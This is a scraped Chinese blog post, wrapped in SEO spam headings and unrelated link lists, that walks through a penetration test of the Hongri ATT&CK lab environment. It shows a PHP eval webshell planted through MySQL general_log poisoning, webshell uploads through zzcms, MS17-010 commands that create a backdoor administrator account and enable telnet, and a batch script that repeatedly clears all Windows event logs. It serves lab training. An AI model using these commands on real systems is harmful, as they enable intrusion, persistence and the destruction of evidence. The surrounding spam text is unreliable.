当前位置: 首页 > news >正文

成都网站建设推广详wordpress主体首页空

成都网站建设推广详,wordpress主体首页空,自己做公司网站难吗,上网站 ftp目录 下载地址红日靶场基本环境配置攻击思维导图网络结构 系统环境配置外网打点对phpmyadmin渗透对zzcms的渗透#xff1a;getshell失败案例getshell成功案例模版制作#xff1a;应用导入上传#xff1a;其他方式#xff1a; 内网渗透信息收集msf上线#xff1a;搭建隧道内… 目录 下载地址红日靶场基本环境配置攻击思维导图网络结构 系统环境配置外网打点对phpmyadmin渗透对zzcms的渗透getshell失败案例getshell成功案例模版制作应用导入上传其他方式 内网渗透信息收集msf上线搭建隧道内网探测上线cs横向移动成功msf横向尝试失败了 换了ms17-010命令执行pocftp匿名登录失败痕迹清理bat参考链接 下载地址 下载地址 红日靶场 红队实战系列主要以真实企业环境为实例搭建一系列靶场通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATTCK攻击链路进行搭建开成完整闭环。后续也会搭建真实APT实战环境从实战中成长。关于环境可以模拟出各种各样实战路线目前给出作者实战的一套攻击实战路线如下虚拟机所有统一密码hongrisec2019 一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜索与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集 三、内网搜集 7.内网–继续信息收集 8.内网攻击姿势–信息泄露 9.内网攻击姿势-MS08-067 10.内网攻击姿势-SMB远程桌面口令猜测 11.内网攻击姿势-Oracle数据库TNS服务漏洞 12.内网攻击姿势-RPC DCOM服务漏洞 四、横向移动 13.内网其它主机端口-文件读取 14.内网其它主机端口-redis 15.内网其它主机端口-redis Getshell 16.内网其它主机端口-MySQL数据库 17.内网其它主机端口-MySQL提权 五、构建通道 18.内网其它主机端口-代理转发 六、持久控制 19.域渗透-域成员信息收集 20.域渗透-基础服务弱口令探测及深度利用之powershell 21.域渗透-横向移动[wmi利用] 22.域渗透-C2命令执行 23.域渗透-利用DomainFronting实现对beacon的深度隐藏 24.域渗透-域控实现与利用 七、痕迹清理 25、日志清理 基本环境配置 攻击思维导图 网络结构 主机IP网卡Kali Linux192.168.200.*NATWindwos7192.168.200.* /192.168.52.*NAT/VMnet2Win2k3192.168.52.*VMnet2仅主机Windows192.168.52.*VMnet2仅主机 备注按照自己喜好可以设置NAT网卡和vmnet仅主机模式都行因为windows7只要主机能够通信就行。 添加一个vmnet2网卡仅主机模式用于内网域环境通信 点击应用保存 系统环境配置 windwos7使用双网卡 我这已经添加 启动靶机windows7 密码:hongrisec2019 启动其他两台域控制器环境 测试通信 查看域控制器环境 ping注意这里不能pingwindows7禁ping 启动windows7 的web环境 关闭防火墙或者开放80端口 到这里就可以开始渗透测试了 外网打点 目标192.168.200.128 直接扫全端口 还有永恒之蓝如果防火墙开启应该就没有了。 发现80和3306端口开放 访问网站发现phpstudy探针系统为windows7 这里看到www目录的文件位置 扫描一下目录 一些敏感文件 phpmyadmin的版本 对phpmyadmin渗透 测试弱密码 root root 没想到这么简单就进来了 因为版本很多已知漏洞无法使用有一些POChttps://www.exploit-db.com/exploits/25003 这里用常用方法getshellhttps://www.freebuf.com/articles/web/226240.html 收集到信息 show variables like %general%;general_log日志保存状态这里为off general_log_file日志保存路径开启日志保存并配置保存路径 set global general_log ON; set global general_log_file C:/phpStudy/WWW/log.php;select ?php eval($_POST[pwd]); ?;打开蚁剑连接 对zzcms的渗透 访问一下 尝试注册功能 成功 查找上传点 测试一下上传 先测试一下 上传图片成功但是需要审核这里就不能上传了找一下后台登录点 没注意这里 这里提示我们后台位置和账户密码大概漏洞存在与后台可能作者是想让我们从cms上进行拿shell这里也可将备份文件下载到本地进行代码审计 getshell失败案例 寻找上传点 图集上传点 寻找上传文件位置没找到 getshell成功案例 模版制作 模版文件这好像可以直接添加php文件 文件里面找到 应用导入上传 虽然我们不知道cms的应用怎么写的直接上传一个shell.php文件 打包换个名字上传 把member模块停用启用test 寻找上传文件 连接测试 这里我写错马了重新上传了一个test1连接 其他方式 可以通过3306登录获取shell我们在下载模板文件时可以看到数据库的用户名密码 这里没有进行测试 大家有兴趣可以尝试获取也可以通过网上披露的已知漏洞进行攻击也可以做深入的代码审计方法很多包括使用永痕之蓝漏洞msf可以直接提到system权限这里不在继续。 内网渗透 传个fscan扫一扫 信息收集 判断主机是否加入域 方法一 net time /domain #如果当前主机处于工作组中未加入域则显示找不到域控制器 #加入了域且当前用户为本地用户包括本地管理员则显示拒绝访问 加入了域且当前用户域用户则显示域控的时间方法二 net config workstation #如果命令返回信息中包含“工作站域”则说明该计算机已经加入了域。看下网段发现内网网段 方法三 echo %userdomain%这里可以看一下windows7使用杀软没 没有识别到杀软可以做msf上线或者做内网穿透或者冰蝎隧道不推荐看个人选择也可以上线cs做横向移动或者权限维持这里我选择做简单的权限维持。 msf上线 生成msf马 kali监听 上传马 执行 提权getsystem 搭建隧道 background 使用sockes模块 use auxiliary/server/socks_proxy set srvport 1050 run配置 vim /etc/proxychains4.conf 添加 内网探测 使用nmap探测一下存在防火墙 proxychains nmap -PN --script smb-vuln* -p139,445 192.168.52.138 proxychains nmap -PN --script smb-vuln* -p139,445 192.168.52.141上线cs横向移动成功 生成cs马 上传运行 提权 探测 抓取明文密码这里我密码改了就不放出来了 添加smb的监听因为我们拿到内网的一台权限了使用这台上面的权限横向到其他两台上 添加监听 选择win7和我们加的监听 另一台同样操作成功获取内网权限 msf横向尝试失败了 代理后直接可以横向移动 上面fscna探测出网段存在ms17-010直接利用利用失败了 怀疑是防火墙拦截了后面关了防火墙也不行 我这想用msf上线前面msf上线失败了因为kali的sock5代理有点问题我这用cs的代理 使用kali做socks4的代理 换了ms17-010命令执行poc 使用ms17-010命令执行poc //这里直接创建用户julien密码julien123 use auxiliary/admin/smb/ms17_010_command set COMMAND net user set RHOST 192.168.52.138 set COMMAND net user julien julien123 run //将hack用户添加到管理员组 set COMMAND net localgroup administrators julien /add run set COMMAND sc config tlntsvr start auto run set COMMAND net start telnet run set COMMAND netstat -an run发现138这台23端口无法打开命令执行有问题换成141这台远程是可以的但是一直提示我密码错误不知道什么原因 ftp匿名登录失败 use auxiliary/scanner/ftp/anonymous set rhosts 192.168.52.141 run不存在后面版本 但不能写入本次渗透就做到这里 痕迹清理bat 这里不在操作 echo off mode con cols40 lines7 color 89 title 自动清理日志 :up echo 清理中 请稍等... FOR /F delims %%I IN (WEVTUTIL EL) DO (WEVTUTIL CL %%I) cls for /L %%a in (10,-1,0 ) do ( echo ---------------------------------------- echo 每10分钟清理一次 echo ---------------------------------------- echo %%a 分钟后开始清理 echo ---------------------------------------- ping -n 60 localhost 1nul 2nul cls ) goto up参考链接 https://www.freebuf.com/articles/web/324441.html https://www.freebuf.com/articles/web/226240.html
http://www.huolong8.cn/news/131966/

相关文章:

  • 东莞做网站公司有哪些百度文库官网首页
  • 政务公开网站建设要求网站克隆 有后台登录
  • 南宁网站建设哪家公司实力西安网站建设价格低
  • 广西住房城乡建设网站怎么知道这网站是php语言做的
  • 美食网站 原型 html 下载手机移动网站开发
  • 做影视网站引流计算机专业论文 网站建设
  • 中国建设部网站官网罗湖商城网站设计多少钱
  • 莱州 网站制作网站到期查询
  • 广州商务网站建设电话身边的网络营销案例
  • 台州网站建设系统如何设计一个公司的网页
  • 网站的结构是什么样的怎么申请信用卡收款网站接口
  • 容桂网站制作咨询北京网站设计必看刻
  • 建设网站公司 优帮云网站建设需要什么研究条件
  • 网页设计与网站建设考试题目东莞网站建设 牛魔网
  • 做网站卖仿品温州房产信息网
  • 网站模板 htmlwordpress comments.php
  • 网站同步更新到新浪微博电商网站商品页的优化目标是什么
  • 个体户经营范围网站建设网站建设全程揭秘pdf
  • 网站建设公司电话网站建设和维护待遇
  • 长春网站上排名渭南建设厅官网
  • asp网站开发人员招聘广州 网站设计公司排名
  • 全是广告的网站网站做调查需要考虑的内容
  • 视频上传下载网站建设成都seo推广
  • 网站500m空间价格中企动力电话号码
  • 网站表单提交中企动力做的网站
  • 3如何做网站推广神华集团 两学一做 网站
  • 澧县住房和城乡建设局网站怎么做网络运营
  • 金华免费模板建站一站式电商网站建设
  • 中山网站建设工作室搏彩网站开发建设
  • 制作网站链接企业运营管理师